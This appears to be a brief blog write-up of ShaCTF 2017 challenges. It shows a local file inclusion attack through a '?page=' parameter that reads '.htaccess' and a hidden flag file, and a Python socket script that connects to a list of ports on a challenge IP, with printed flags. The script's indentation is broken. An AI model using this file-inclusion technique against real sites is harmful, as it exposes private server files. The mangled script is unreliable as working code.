ShaCTF 2017 Challenges [Web 100pts , Binary 100pts , Network 100pts] | October 20, 2017

[Web 100pts]

we given this target :

http://bonappetit.stillhackinganyway.nl/

after some browsing we Got this parametre is effected by Vulnerability LFI

http://bonappetit.stillhackinganyway.nl/?page=

from source code :

http://bonappetit.stillhackinganyway.nl/?page=.htaccess

<FilesMatch "suP3r_S3kr1t_Fl4G">

http://bonappetit.stillhackinganyway.nl/?page=suP3r_S3kr1t_Fl4G

the flag : flag{82d8173445ea865974fc0569c5c7cf7f}


The challenge name and description and the servers’ response ,

by using a script :

#!/usr/bin/python 
import socket 
plist = [88, 156, 983, 1287, 8743, 5622, 9123]
host = '34.249.81.124'
data = "" 
for p in plist: 
print("Attempting to connect to %s on port %s" % (host, p)) 
try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1.0) s.connect((host, p)) 
data += s.recv(1024) 
data += s.recv(1024) 
data += s.recv(1024) 
s.close() 
except Exception as e: continue print data

Attempting to connect to 34.249.81.124 on port 88

Attempting to connect to 34.249.81.124 on port 156

Attempting to connect to 34.249.81.124 on port 983

Attempting to connect to 34.249.81.124 on port 1287

Attempting to connect to 34.249.81.124 on port 8743

Attempting to connect to 34.249.81.124 on port 5622

Attempting to connect to 34.249.81.124 on port 9123

flag{6283a3856ce4766d88c475668837184b}

This Video include write ups of the 3 challenges : web , Binary , Network

#0v3n_Sh3ll ❤

Written on October 20, 2017